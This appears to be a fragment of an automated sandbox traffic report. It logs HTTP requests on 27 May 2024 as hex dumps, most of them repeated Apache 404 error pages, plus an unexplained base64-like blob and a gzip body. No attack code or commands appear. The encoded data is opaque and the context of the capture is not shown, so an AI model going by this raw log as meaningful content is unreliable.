79 36 67 39 6b 72 75 49 44 39 5a 79 4f 65 52 72 2f 74 72 76 34 43 65 72 65 42 67 78 72 5a 68 74 72 38 49 55 43 2f 4f 35 58 35 6d 4d 51 33 53 67 59 58 6c 43 2b 31 36 6d 37 46 58 75 42 6a 7a 5a 6c 52 35 62 5a 31 70 36 45 56 74 62 45 35 74 78 38 79 6f 73 54 72 65 38 63 35 52 55 2f 6a 67 66 4e 50 43 34 78 33 44 46 66 69 57 41 3d 3d Data Ascii: R40L6=2UG677uIDGFYqXE0dm59+LEBdrClAZLZ95VRi0UhOFBCzvl5pSVXIQJ+vDUM2LbzaZMdDfKF/OJ8l3ZiUIfV1ossT7IaHxOLQ1mWkxy6g9kruID9ZyOeRr/trv4CereBgxrZhtr8IUC/O5X5mMQ3SgYXlC+16m7FXuBjzZlR5bZ1p6EVtbE5tx8yosTre8c5RU/jgfNPC4x3DFfiWA==
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:21:49 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:21:51 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:21:51 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:21:51 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:21:54 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:21:56 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:22:03 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0
